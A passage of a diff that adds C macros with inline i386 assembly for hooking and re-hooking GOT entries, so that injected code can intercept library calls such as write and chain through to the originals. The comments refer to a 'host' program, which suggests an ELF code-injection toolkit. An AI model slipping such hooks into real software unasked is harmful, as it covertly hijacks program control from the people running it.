+                "       .fill   "##arraylen", 4, 0x0\n" \
+                "\n" \
+                "l0_%=: call    l1_%=\n" \
+                "l1_%=: popl    %%edx\n" \
+                "       addl    $lp_%=, %%edx\n" \
+                "       subl    $l1_%=, %%edx\n" \
+                "\n" \
+                "       pushl   %%eax\n" \
+                "       movl    0x4(%%ebp), %%eax\n" \
+                "       cmpl    $0x64466226, %%eax\n"   /* magic */ \
+                "       jne     lo_%=\n" \
+                "\n" \
+                "       movl    0x8(%%ebp), %%eax\n" \
+                "       movl    %%eax, (%%edx)\n"       /* chain */ \
+                "       movl    0xc(%%ebp), %%eax\n" \
+                "       movl    %%eax, 4(%%edx)\n"      /* any */ \
+                "       movl    0x10(%%ebp), %%ecx\n"   /* load counter */ \
+                "       movl    %%ecx, 8(%%edx)\n" \
+                "       pushl   %%esi\n" \
+                "       movl    0x14(%%ebp), %%esi\n"   /* source array */ \
+                "       leal    12(%%edx), %%edx\n" \
+                "l2_%=: lodsl\n" \
+                "       movl    %%eax, (%%edx)\n" \
+                "       addl    $0x4, %%edx\n" \
+                "       decl    %%ecx\n" \
+                "       jnz     l2_%=\n" \
+                "       popl    %%esi\n" \
+                "\n" \
+                "       popl    %%eax\n" \
+                "       movl    %%ebp, %%esp\n" \
+                "       popl    %%ebp\n" \
+                "       addl    $0x14, %%esp\n" \
+                "       ret\n" \
+                "\n" \
+                "lo_%=: popl    %%eax\n" \
+                : "=d" (chainstr) : : "eax"); \
+}
+
+/* convenience macros, use if you want and don't care about the messy details
+ * use CHAINSTART directly after local variables of the hook-function,
+ * CHAINCALL directly before calling the original function, and CHAINEND after
+ * the chain function has been called:
+ *
+ * int
+ * my_write (int fd, char *buf, int len)
+ * {
+ *      int     rval;
+ *      int     (* old_write)(int, char *, int);
+ *
+ *      CHAINSTART (old_write);
+ *      CHAINCALL;
+ *      rval = old_write (fd, buf, len);
+ *      CHAINEND;
+ *
+ *      return (rval);
+ * }
+ *
+ * would be the most basic chain-through function for the 'write' function.
+ *
+ * XXX: it is utmost important to put the CHAINSTART macro directly after the
+ *      local variables, before any code.
+ *
+ * CHAINCALL is used to prepare the %ebx register to point to the shared GOT
+ * table. technically, it is only needed when redirecting shared library GOT
+ * table entries, but it does not hurt to include it in any case.
+ *
+ * CHAINEND checks whether the GOT entry was overwritten by the runtime
+ * linker, as it happens when lazy binding is used and the function is called
+ * the first time. we update our address (cstr->chain) and overwrite the GOT
+ * entry again with our function. this has to be done, since we usually
+ * receive control, before any library function has been called. you can leave
+ * the CHAINEND macro out, if you want to receive control only once, on the
+ * first call (say, when the host is calling exit or fork). though it is not
+ * guaranted that it will be only called once.
+ */
+#define CHAINSTART(chainfn) \
+        CHAINSTART_M(chainfn,1,"1");
+
+#define CHAINEND \
+        CHAINEND_M;
+
+#define CHAINSTART_M(chainfn,arraylen,arraylenstr) \
+        CHAINSTRUCT(arraylen) \
+        unsigned int *  cthis[arraylen]; \
+        unsigned int    creg_ebx; \
+        unsigned int    cgot_wk; \
+        \
+        __asm__ __volatile__ ("" : "=b" (creg_ebx)); \
+        PTRCONTROL (cstr,arraylenstr); \
+        chainfn = (void *) cstr->chain; \
+        for (cgot_wk = 0 ; cgot_wk < cstr->gotcount && \
+                cstr->gotloc[cgot_wk] != NULL ; ++cgot_wk) \
+        { \
+                cthis[cgot_wk] = (unsigned int *) *cstr->gotloc[cgot_wk]; \
+        }
+
+#define CHAINCALL \
+        __asm__ __volatile__ ("" : : "b" (creg_ebx));
+
+#define CHAINEND_M \
+        for (cgot_wk = 0 ; cgot_wk < cstr->gotcount && \
+                cstr->gotloc[cgot_wk] != NULL ; ++cgot_wk) \
+        { \
+                if (cthis[cgot_wk] != (unsigned int *) *cstr->gotloc[cgot_wk]) { \
+                        cstr->chain = (void *) *cstr->gotloc[cgot_wk]; \
+                        *cstr->gotloc[cgot_wk] = (unsigned int) cthis[cgot_wk]; \
+                } \
+        }
+
+
+/* old macros, still work, but its better to just have to maintain one version
+ */
+#if 0
+#define CHAINSTART(chainfn) \
+        CHAINSTRUCT(1) \
+        unsigned int *  cthis; \
+        unsigned int    creg_ebx; \
+        \
+        __asm__ __volatile__ ("" : "=b" (creg_ebx)); \
+        PTRCONTROL (cstr); \
+        chainfn = cstr->chain; \
+        cthis = (unsigned int *) *cstr->gotloc[0];
+
+#define CHAINEND \
+        if (((unsigned int) cthis) != *cstr->gotloc[0]) { \
+                cstr->chain = (void *) *cstr->gotloc[0]; \
+                *cstr->gotloc[0] = (unsigned int) cthis; \
+        }
+#endif
+